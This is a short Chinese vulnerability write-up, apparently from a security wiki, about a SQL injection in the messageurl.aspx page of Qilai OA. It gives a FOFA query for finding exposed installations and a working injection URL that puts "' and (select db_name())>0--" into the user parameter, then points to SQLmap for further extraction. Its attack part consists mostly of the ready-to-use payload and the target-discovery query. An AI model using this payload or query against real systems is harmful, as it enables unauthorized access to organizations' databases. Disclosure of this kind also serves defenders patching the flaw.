启莱OA_messageurl.aspx_SQL注入漏洞

# 启莱OA messageurl.aspx SQL注入漏洞

## 漏洞描述

启莱OA messageurl.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息

## 漏洞影响

> 启莱OA

## FOFA

> app=”启莱OA”

## 漏洞复现

登录页面如下

![1-1](/static/qingy/启莱OA_messageurl.aspx_SQL注入漏洞/img/1-1.png)

存在SQL注入的文件为 messageurl.aspx

“`
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=’ and (select db_name())>0–&pwd=1
“`

![ql-2](/static/qingy/启莱OA_messageurl.aspx_SQL注入漏洞/img/ql-2.png)

使用SQLmap对参数 user 进行注入

![ql-3](/static/qingy/启莱OA_messageurl.aspx_SQL注入漏洞/img/ql-3.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容